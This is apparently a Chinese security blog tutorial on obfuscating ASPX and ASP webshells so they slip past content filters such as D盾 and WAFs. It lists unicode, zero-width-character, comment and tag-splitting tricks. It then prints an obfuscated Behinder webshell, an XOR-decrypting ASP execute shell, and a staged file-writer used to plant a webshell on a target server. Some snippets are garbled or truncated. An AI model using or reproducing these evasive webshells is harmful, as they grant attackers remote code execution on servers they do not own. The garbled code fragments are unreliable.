请遵守法律法规，文章旨在提高安全软件的应变策略，严禁非法使用，后果自负。

前言

在攻防场景下，黑客常常在找到某个上传接口，第一步肯定是先测试后缀是否有限制，第二步则是测试上传的文件是否能解析，最后便确认即将要上传的webshell内容是否有拦截。这里针对webshell内容拦截这块做了记录，下面先对aspx类型和asp类型这两块展开，希望能给大家作为参考。

一、Aspx类型

其中aspx类型中，我们可以利用下面列出的这些特性对内容作对应的处理，以达到免杀的目的

1、unicode编码
2、空字符串连接
3、<%%>截断
3、头部替换
5、特殊符号@
6、注释

1.unicode编码

例如"eval"他可以变为\u0065\u0076\u0061\u006C

那么如下例子可以转换为：

<%@ page language='Jscript'><%\u0065\u0076\u0061\u006c(@request.item["hello"],"unsafe");%>

在JScript的情况下它不支持大U和多个0的增加，但是在c#的情况下，是可以支持大U和多个0的增加。

2、空字符串连接

unicode是支持在aspx里进行的，同样的，它也支持asmx和ashx，估计这类特性都是通用的。并且在unicode有一类字符叫做零宽连字符(全称zero width joiner)。

在函数字符串中插入这些字符都不会影响脚本的正常运行，在测试前需要注意该类字符插入的位置，否则插入错误的地方会产生报错

\u200c
\u200d
\u200e
\u200f

除了上面的zero width joiner，还有一种unicode编码叫做零宽不折行空格，也就是如下几种字符，都支持在字符间进行拼接

\ufeff
\u202a
\u202b
\u202c
\u202d
\u202e

例子：

<%c request.binaryreadrequest.c\u202con\u202dtent\u202blen\u202egth>

3、使用<%%>语法

将整个字符串与函数利用多个<%%>进行分割

<%@ page language='Jscript'><%\u0065\u0076\u0061\u006c%><%(request.%>

4、头部免杀

该字段可以放在后面，不一定要放前面

<%@page language='csharp'>
<%@ page language='Jscript'>
<%@page language='JS%'>
<% language='Csharp'>

5、使用符号

可以添加@符号但是不会影响其解析

<%.@createdecryptor(system.text.encoding.default.getbytes(key), system.text.encoding.default.getbyteskey>

6、注释插入

<%/*TreeObject*/./*TreeObject*/GetBytes(Session[0] + ""),%>

7、花括号和分号

{}和分号;在原本语法结束的地方可以添加大量的该类混淆，不会影响其原本的解析

<% page language='c#%'>;;;;;;;;;;;;;;;;;;;;
<%@import><%session.add("k","e45e329feb5d925b");{{{}}} byte k='Encoding.Default.GetBytes(Session[0]' c='Request.BinaryRead(Request.ContentLength);{{{;}}}' assembly.loadnew system.security.cryptography.rijndaelmanaged.createdecryptork k.transformfinalblockc 0 c.length.createinstanceu.equalsthis>

8、aspx别的声明标签

在php中，解析引擎可以认识

1、XML标记风格

2、脚本风格
<script language='php'>
echo "脚本风格"；
</script>
3、简短标记风格

注意php.ini中的short_open_tag 选项必须为on
4、ASP标记风格
<% echo asp>
注意php.ini中的asp_tags 选项必须为on

aspx中也有类似的标签风格，如下：

<% language='C#'>
<%response.write("hello");%>

<script language=csharp runat=server>
void page_load(){Response.Write("hello");}
</script>

9、换行特性

10、c#的 ///特性和xml

c#规定了/// 能够在aspx中作为xml语法的注释，那么在实际使用中，我们结合换行、unicode特性可以这样做，在如下内容中加入///充当注释：

<% language='c#'>
<% import>
<%session.add("k", e45e329feb5d925b byte k='Encoding.Default.GetBytes(Session[0]' c='Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);'>

那么这时我们综上所说到的这些特性，对冰蝎马进行免杀处理，可以得到如下内容：

<%@import>
<%\U00000053\U00000065\U00000073\U00000073\U00000069\U0000006F\U0000006E/*TreeObject*/.\U00000041\U00000064\U00000064("k","e45e329feb5d925b"); %>
<%byte[] k='\U00000045\U0000006E\U00000063\U0000006F\U00000064\U00000069\U0000006E\U00000067/*TreeObject*/./*TreeObject*/Default%'>
<%/*TreeObject*/./*TreeObject*/\U00000047\U00000065\U00000074\U00000042\U00000079\U00000074\U00000065\U00000073(\U00000053\U00000065\U00000073\U00000073\U00000069\U0000006F\U0000006E[0] + ""),//////@#@!#!@#!@#!@#!@#!@#!@#%>
<%c \u00000052\u00000065\u00000071\u00000075\u00000065\u00000073\u00000074treeobject.treeobject\u00000042\u00000069\u0000006e\u00000061\u00000072\u00000079\u00000052\u00000065\u00000061\u00000064treeobjectrequest.contentlengthtreeobject>
<%Assembly/*TreeObject*/./*TreeObject*/@\U0000004C\U0000006F\U00000061\U00000064(new System./*TreeObject*/Security%>
<%./*TreeObject*/@\U00000043\U00000072\U00000079\U00000070\U00000074\U0000006F\U00000067\U00000072\U00000061\U00000070\U00000068\U00000079.\U00000052\U00000069\U0000006A\U0000006E\U00000064\U00000061\U00000065\U0000006C\U0000004D\U00000061\U0000006E\U00000061\U00000067\U00000065\U00000064()%>
<%./*TreeObject*/@\U00000043\U00000072\U00000065\U00000061\U00000074\U00000065\U00000044\U00000065\U00000063\U00000072\U00000079\U00000070\U00000074\U0000006F\U00000072(k, k)%>
<%./*TreeObject*/@\U00000054\U00000072\U00000061\U0000006E\U00000073\U00000066\U0000006F\U00000072\U0000006D\U00000046\U00000069\U0000006E\U00000061\U0000006C\U00000042\U0000006C\U0000006F\U00000063\U0000006B(c, 0, c.Length))%>
<%./*TreeObject*/\U00000043\U00000072\U00000065\U00000061\U00000074\U00000065\U0000202c\U00000049\U0000006E\U00000073\U00000074\U00000061\U0000006E\U00000063\U00000065/*TreeObject*/%>
<%(/*TreeObject*/"U"/*TreeObject*/%>
<%)%>
<%./*TreeObject*/\U00000045\U00000071\U00000075\U00000061\U0000006C\U00000073(this);{{{;}}}%>
<% language='CSHARP'>

同理，哥斯拉等其他的也可以按照这种方法作免杀处理。

二、ASP类型

可通过变量赋值替换，组合换行的方式进行免杀

比如常见的一句话通过变量赋值替换，即可免杀D盾

<%dim a5><%a(0) request404><%b ltrima0><%response.write("hello")%><%execute(b)%>

那么下面我们就可以利用这两个特性对冰蝎马进行免杀处理，同样得到如下内容：

<%response.write("welcome,this is a testpage><%dim a5><%response.charset utf-8> <%k="3b0c14770e6bd663"><%session("k")=k%><%size=request.totalbytes%><%content=request.binaryread(size)%><%for i='1' to size><%x=ascb(midb(content,i,1))%><%y=asc(mid(k,(i and 1511><%result=result&chr(x xor y><%a(0)=result%><%b ltrima0><%next%>
<%>

ps：再补充一个之前在xx项目测试中，利用中间马的方式绕过waf写入webshell，大概原理就是先上传一个写文件功能的，利用该功能再往目标服务器写入webshell。

往当前目录写入TypeError.asp，文件内容为<%response.write("hello")%>

Server.CreateObject(\"Scripting.FileSystemObject\").OpenTextFile(Server.MapPath(\"TypeError.asp\"),2,True).WriteLine(HexToStr("3c25726573706f6e73652e7772697465282268656c6c6f2229253e"))

其中我们再定义两个函数用于混淆

Function JXMD(MM):
MM = Split(MM,"-")
For x=0 To Ubound(MM)
JXMD=JXMD&Chr(MM(x))
Next
End Function

Function HexToStr(ByRef strHex)
Dim Length
Dim Max
Dim Str
Max = Len(strHex)
For Length = 1 To Max Step 2
Str = Str & Chr("&h" & Mid(strHex, Length, 2))
Next
HexToStr = Str
End function

ok，接下来我们再做一下数据处理

最后可以得到如下内容：

<%>

同样也是具有免杀效果的

这里可以看到访问02.asp成功往目标服务器当前目录写入预先内容的TypeError.asp

利用这种方式，我们便可以绕过waf往目标写入webshell，从而获取服务器权限。

同理，aspx类型的也可以利用这种方式尝试绕过waf写入对应的webshell。